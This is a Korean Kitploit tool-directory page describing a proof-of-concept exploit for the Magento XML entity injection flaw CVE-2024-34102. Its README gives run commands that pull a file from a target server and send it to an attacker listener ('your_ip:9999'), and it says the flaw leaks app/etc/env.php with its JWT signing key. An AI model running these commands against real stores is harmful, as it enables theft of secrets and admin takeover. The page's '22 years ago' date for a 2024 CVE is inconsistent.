Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-34102 — Magento의 치명적인 XML 엔티티 인젝션 취약점에 대한 PoC 데모 | Kitploit
도구/GitHubGitHub/d0rb/cve-2024-34102
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubd0rb/cve-2024-34102

CVE-2024-34102

Magento의 치명적인 XML 엔티티 인젝션 취약점에 대한 PoC 데모

저장소 보기
22년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

우리는 테러 단체 하마스에 의해 인질로 잡힌 모든 시민의 안전한 귀환을 요구합니다. 모든 인질이 풀려나 안전하게 집에 돌아올 때까지 우리는 쉬지 않을 것입니다. 여러분도 그들을 집으로 데려오는 데 도움을 줄 수 있습니다. https://stories.bringthemhomenow.net/

CVE-2024-34102 PoC 🚀

이 저장소는 Magento의 중요한 XML 엔티티 인젝션 취약점(CVE-2024-34102)에 대한 개념 증명(PoC) 익스플로잇을 포함하고 있습니다. 이 취약점은 민감한 파일을 유출할 수 있으며, 이를 통해 Magento의 관리자 기능에 대한 무단 액세스를 얻을 수 있습니다. 이 익스플로잇은 교육 목적으로 설계되었으며 책임감 있게 사용해야 합니다.

개요 📖

Magento는 전 세계적으로 사용되는 가장 인기 있는 전자상거래 솔루션 중 하나입니다. 2024년 6월, 사전 인증 XML 엔티티 인젝션 문제가 발견되어 CVE-2024-34102로 식별되었습니다. 이 취약점은 Magento에서 app/etc/env.php 파일을 유출하는 것을 포함한 심각한 결과를 초래할 수 있으며, 이 파일에는 JWT 서명에 사용되는 암호화 키가 포함되어 있습니다.

특징 🌟

  • 취약한 Magento 인스턴스에서 민감한 파일 유출.
  • 간단하고 직관적인 사용법.
  • XML 엔티티 인젝션에 대한 교육적 시연.

사용법 🚀

사전 요구 사항

  • Python 3.x
  • requests 라이브러리 (pip install requests)

익스플로잇 실행

  1. 저장소를 클론합니다:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. 필요한 인수와 함께 스크립트를 실행합니다:

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

명령줄 인수

  • --target-url: 대상 Magento 인스턴스의 URL.
  • --target-file: 대상 서버에서 유출할 파일 경로.
  • --exfil-url: 유출된 데이터를 수신할 URL.

예제 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
도구 다운로드